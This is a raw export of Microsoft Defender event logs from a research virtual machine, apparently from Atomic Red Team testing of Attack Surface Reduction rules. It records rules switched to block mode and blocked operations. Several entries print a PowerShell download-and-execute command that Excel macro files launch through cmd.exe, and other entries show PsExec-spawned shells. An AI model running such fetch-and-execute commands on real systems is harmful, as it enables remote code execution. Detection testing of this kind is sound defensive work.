112103000x80000000000000002975Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T16:29:48.984Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000
112103000x80000000000000002972Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.20093B576869-A4EC-4529-8536-B80A7769E8992023-11-20T16:27:30.572Zresearchvmhaa\researchC:\Users\research\AppData\Local\Temp\script.vbsC:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE1.401.912.01.1.23100.2009ENT\ConsR"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" 0x00000000
112103000x80000000000000002971Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T16:27:18.000Zresearchvmhaa\researchC:\Windows\System32\rundll32.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.912.01.1.23100.2009ENT\ConsRC:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls"C:\Users\research\Desktop\macs\mac5.xls0x00000000
112103000x80000000000000002964Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:46.183Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls"C:\Users\research\Desktop\macs\mac7.xls0x00000000
112103000x80000000000000002963Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:37.633Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls"C:\Users\research\Desktop\macs\mac8.xls0x00000000
112103000x80000000000000002961Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009D4F940AB-401B-4EFC-AADC-AD5F3C50688A2023-11-20T15:42:14.127Zresearchvmhaa\researchC:\Windows\System32\cmd.exeC:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE1.401.908.01.1.23100.2009ENT\ConsRcmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac6.xls"C:\Users\research\Desktop\macs\mac6.xls0x00000000
500704000x80000000000000002911Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
500704000x80000000000000002908Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009HKLM\SOFTWARE\Microsoft\Windows Defender\SmartLockerMode = 0x1HKLM\SOFTWARE\Microsoft\Windows Defender\SmartLockerMode = 0x0
500704000x80000000000000002907Microsoft-Windows-Windows Defender/OperationalresearchvmhaaMicrosoft Defender Antivirus4.18.23100.2009HKLM\SOFTWARE\Microsoft\Windows Defender\VerifiedAndReputableTrustModeEnabled = 0x1HKLM\SOFTWARE\Microsoft\Windows Defender\VerifiedAndReputableTrustModeEnabled = 0x0
11/20/2023 03:31:50 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2779
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: Default\SacLearningModeSwitch = 0x0
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\SacLearningModeSwitch = 0x1
11/20/2023 03:31:45 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2772
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/19/2023 03:39:33 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2740
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
New value:
11/19/2023 01:31:53 AM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2597
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value:
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
11/18/2023 12:31:48 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2496
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Features\Controls\48 = 0x1
New value:
11/17/2023 05:29:44 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2398
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:29:44.894Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac8.xls"
Involved File: C:\Users\research\Desktop\macs\mac8.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2397
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\75668C1F-73B5-4CF0-BB93-3ECF5CB7CC84 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2396
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\5BEB7EFE-FD9A-4556-801D-275E5FFC04CC = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2395
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D4F940AB-401B-4EFC-AADC-AD5F3C50688A = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2394
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\d1e49aac-8f56-4280-b9ba-993a6d77406c = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2393
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\7674ba52-37eb-4a4f-a9a1-f0f9a1619a2c = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2392
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\BE9BA2D9-53EA-4CDC-84E5-9B1EEEE46550 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2391
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\92E97FA1-2EDF-4476-BDD6-9DD0B4DDDC7B = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2390
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2389
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\e6db77e5-3df2-4cf1-b95a-636979351e5b = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2388
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\D3E037E1-3EB8-44C8-A917-57927947596D = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2387
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\c1db55ab-c21a-4637-bb3f-a12568109d35 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2386
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\56a863a9-875e-4185-98a7-b882c64b5ce5 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2385
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\3B576869-A4EC-4529-8536-B80A7769E899 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2384
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\01443614-cd74-433a-b99e-2ecdc07bfc25 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2383
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\26190899-1602-49e8-8b27-eb1d0a1ce869 = 0x1
11/17/2023 05:29:17 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=5007
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2382
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.
Old value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x6
New value: HKLM\SOFTWARE\Microsoft\Windows Defender\Windows Defender Exploit Guard\ASR\Rules\b2b3f03d-6a65-4f7b-a9c7-1c7ef74a9ba4 = 0x1
11/17/2023 05:27:28 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2379
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:27:28.753Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac7.xls"
Involved File: C:\Users\research\Desktop\macs\mac7.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:27:18 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2378
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:27:18.518Z
User: researchvmhaa\research
Path: C:\Windows\System32\rundll32.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {c08afd90-f2a1-11d1-8455-00a0c91f3880} -Embedding
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac5.xls"
Involved File: C:\Users\research\Desktop\macs\mac5.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:27:11 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2377
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:27:11.636Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macs\mac1.xls"
Involved File: C:\Users\research\Desktop\macs\mac1.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:26:53 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2376
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
Detection time: 2023-11-17T17:26:53.781Z
User: researchvmhaa\research
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
Target Commandline: cmd.exe /c powershell.exe IEX ( IWR -uri 'https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1')
Parent Commandline: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\research\Desktop\macrotestinglive.xls"
Involved File: C:\Users\research\Desktop\macrotestinglive.xls
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:23:37 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1129
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2360
Keywords=None
TaskCategory=None
OpCode=Info
Message=A user has allowed a blocked Microsoft Defender Exploit Guard operation.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Involved File:
11/17/2023 05:23:35 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1129
EventType=4
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Information
RecordNumber=2359
Keywords=None
TaskCategory=None
OpCode=Info
Message=A user has allowed a blocked Microsoft Defender Exploit Guard operation.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Involved File:
11/17/2023 05:23:27 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2358
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T17:23:27.874Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\System32\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:23:27 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2357
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D1E49AAC-8F56-4280-B9BA-993A6D77406C
Detection time: 2023-11-17T17:23:27.753Z
User: NT AUTHORITY\SYSTEM
Path: C:\Windows\cmd.exe
Process Name: C:\Windows\PSEXESVC.exe
Target Commandline: "cmd"
Parent Commandline: C:\Windows\PSEXESVC.exe
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:18:38 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2341
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: 3B576869-A4EC-4529-8536-B80A7769E899
Detection time: 2023-11-17T17:18:38.414Z
User: researchvmhaa\research
Path: C:\Users\research\AppData\Local\Temp\script.vbs
Process Name: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
Target Commandline:
Parent Commandline: "C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
Involved File:
Inheritance Flags: 0x00000000
Security intelligence Version: 1.401.751.0
Engine Version: 1.1.23100.2009
Product Version: 4.18.23100.2009
11/17/2023 05:18:05 PM
LogName=Microsoft-Windows-Windows Defender/Operational
EventCode=1121
EventType=3
ComputerName=researchvmhaa
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
SourceName=Microsoft-Windows-Windows Defender
Type=Warning
RecordNumber=2340
Keywords=None
TaskCategory=None
OpCode=Info
Message=Microsoft Defender Exploit Guard has blocked an operation that is not allowed by your IT administrator.
For more information please contact your IT administrator.
ID: D4F940AB-401B-4EFC-AADC-AD5F3C50688A
